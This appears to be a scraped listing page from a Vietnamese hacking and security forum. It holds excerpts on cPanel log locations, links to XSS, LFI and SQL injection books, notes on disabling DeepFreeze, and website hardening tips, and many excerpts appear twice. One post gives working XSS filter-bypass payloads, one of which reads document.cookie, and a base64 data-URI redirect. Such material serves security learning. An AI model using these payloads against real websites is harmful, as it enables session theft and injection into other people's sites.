Log file của cPanel
Các file log của cPanel được lưu tại thư mục /usr/local/cpanel/logs/, gồm có các file chính sau:
access_log: log truy cập của cPanel và WHM.
error_log: log các lỗi của cPanel và WHM.
login_log: log các đăng nhập cPanel và WHM.
Ngoài ra cPanel còn lưu log hệ thống tại thư mục /var/log/, gòm có
bandwidth: log lưu lượng băng thông sử dụng của server.
chkservd.log: log hệ thống theo dõi các dịch vụ trên server.
clamav: log của hệ thống quét virus clamav.
cpupdate: log tác vụ nâng cấp của cPanel.
exim_mainlog: log gửi/nhận thư của hệ thống mail exim.
exim_rejectlog: log các kết nối bị từ chối của exim.
exim_paniclog: log các lỗi của exim.
maillog: log các đăng nhập và kết nối gửi/nhận thư của các dịch vụ mail (pop3/imap).
xferlog: log các kết nối qua FTP.
Ngoài ra, log của các tài khoản được lưu trữ trong thư mục /usr/local/cpanel/domlogs/ và log của Apache được lưu tại /usr/local/apache/logs/
access_log: log truy cập của cPanel và WHM.
error_log: log các lỗi của cPanel và WHM.
login_log: log các đăng nhập cPanel và WHM.
Ngoài ra cPanel còn lưu log hệ thống tại thư mục /var/log/, gòm có
bandwidth: log lưu lượng băng thông sử dụng của server.
chkservd.log: log hệ thống theo dõi các dịch vụ trên server.
clamav: log của hệ thống quét virus clamav.
cpupdate: log tác vụ nâng cấp của cPanel.
exim_mainlog: log gửi/nhận thư của hệ thống mail exim.
exim_rejectlog: log các kết nối bị từ chối của exim.
exim_paniclog: log các lỗi của exim.
maillog: log các đăng nhập và kết nối gửi/nhận thư của các dịch vụ mail (pop3/imap).
xferlog: log các kết nối qua FTP.
Ngoài ra, log của các tài khoản được lưu trữ trong thư mục /usr/local/cpanel/domlogs/ và log của Apache được lưu tại /usr/local/apache/logs/
Xem Thêm
Books/Tutorials XSS, LFI, RFI, SQLI
XSS
27341454-Cross-Site-Scripting-Attack-and-Defense-Guide.pdfLFI & RFI
6498408-Remote-and-Local-File-Inclusion-Explained.pdfSQLI
SQL Injection Attacks and Defense (2009).pdf
Xem Thêm
XSS Master Guide FOR ALL XPERTS and NOOBS
This is a detailed guide to everything XSS.
What is XSS?
XSS stands for Cross Site Scripting. Sometimes it is called CSS however that is often confused with Cascading Style Sheets so XSS is the preferred term.
Cross Site Scripting is a means to take advantage of web applications that take user input but aren't filtered properly. This allows an attacker to inject HTML or other codes such as Javascript into the server to manipulate it in some way.
What is XSS?
XSS stands for Cross Site Scripting. Sometimes it is called CSS however that is often confused with Cascading Style Sheets so XSS is the preferred term.
Cross Site Scripting is a means to take advantage of web applications that take user input but aren't filtered properly. This allows an attacker to inject HTML or other codes such as Javascript into the server to manipulate it in some way.
Xem Thêm
Bypass XSS filters
Đa số các "bộ lọc" sẽ sử dụng cách cơ bản nhất là chặn các thẻ <script></script>.
Chúng ta sẽ cùng xem một số VD sau:
+Sử dụng các thuộc tính của các thẻ html:
+Sử dụng thuộc tính SRC:
+Sử dụng URI đã được encode base64
Chú ý: một số code có thể không chạy được trên một số trình duyệt.
Đây chỉ là một ít trong số rất nhiều cách thực thi các đoạn mã javascript
Các bạn có thể tham khảo thêm tại: http://ha.ckers.org/xss.html
Chúng ta sẽ cùng xem một số VD sau:
+Sử dụng các thuộc tính của các thẻ html:
<body onload=alert('test1')>
<b onmouseover=alert('Wufff!')>click me!</b>
<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
+Sử dụng thuộc tính SRC:
<IMG SRC=javascript:alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">Encode nội dung (UTF-8)
<IMG SRC=javascript:alert('XSS')>
+Sử dụng URI đã được encode base64
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">
Chú ý: một số code có thể không chạy được trên một số trình duyệt.
Đây chỉ là một ít trong số rất nhiều cách thực thi các đoạn mã javascript
Các bạn có thể tham khảo thêm tại: http://ha.ckers.org/xss.html
Xem Thêm
Mở băng DeepFreeze bằng tay
Với 1 máy đã được cài DeepFreeze. Nếu ở chế độ mở băng ta có thể thay
đổi bình thường, gỡ bỏ chương trình... Với chế độ đóng băng ta không thể
làm gì được. Chương trình DeepFreeze khởi động 1 Driver tên DeepFrz để
đóng băng, muốn vô hiệu hóa đóng băng ta sẽ phải tiến hành vô hiệu hóa
Driver đó từ HĐH khác.
Xem Thêm
TUT UG (video) tổng hợp dành cho newbie
Tổng hợp bộ sưu tập TUT UG (video) dành cho newbie, anh em newbie có thời gian thì tải về nghiên cứu thử nhé
link:
http://www.mediafire.com/?pm55krbicizbc
link:
http://www.mediafire.com/?pm55krbicizbc
Xem Thêm
[TUT] - Bảo mật cho Forum vBulletin
Phần I
Bài viết này Mafia viết thêm dựa trên tài liệu của shacker và một bài viết bằng tiếng Anh viết về bảo mật cho vbb. ok vào đề đi nào!
Bài viết này Mafia viết thêm dựa trên tài liệu của shacker và một bài viết bằng tiếng Anh viết về bảo mật cho vbb. ok vào đề đi nào!
Xem Thêm
10 lưu ý bảo mật dữ liệu cho website
Bài này đc a Justom viết bên enhack
hum nay mình leech về để mọi người tham khảo thêm
10 lưu ý bảo mật dữ liệu cho website PHP sử dụng Shared hosting Linux Ngày nay các ứng dụng web với mã nguồn mở phát triển rất mạnh, trong đó đặc biệt phổ biến là PHP – MySQL. Nhưng công nghệ phát triển đồng thời kéo theo những “tin tặc” trẻ luôn muốn khẳng định mình sau khi xem những hướng dẫn tấn công, khai thác lỗi đầy rẫy trên các forum hacker. Vì thế bất kì một website nào cũng có khả năng bị tấn công bất cứ lúc nào, đặc biệt là các site cá nhân, tập thể vừa và nhỏ sẽ chọn giải pháp là thuê shared hosting trên một server. Vì các shared hosting ở cùng server nên độ riêng tư không cao, việc kiên cố hoá website trên shared hosting là rất cần thiết.
hum nay mình leech về để mọi người tham khảo thêm
10 lưu ý bảo mật dữ liệu cho website PHP sử dụng Shared hosting Linux Ngày nay các ứng dụng web với mã nguồn mở phát triển rất mạnh, trong đó đặc biệt phổ biến là PHP – MySQL. Nhưng công nghệ phát triển đồng thời kéo theo những “tin tặc” trẻ luôn muốn khẳng định mình sau khi xem những hướng dẫn tấn công, khai thác lỗi đầy rẫy trên các forum hacker. Vì thế bất kì một website nào cũng có khả năng bị tấn công bất cứ lúc nào, đặc biệt là các site cá nhân, tập thể vừa và nhỏ sẽ chọn giải pháp là thuê shared hosting trên một server. Vì các shared hosting ở cùng server nên độ riêng tư không cao, việc kiên cố hoá website trên shared hosting là rất cần thiết.
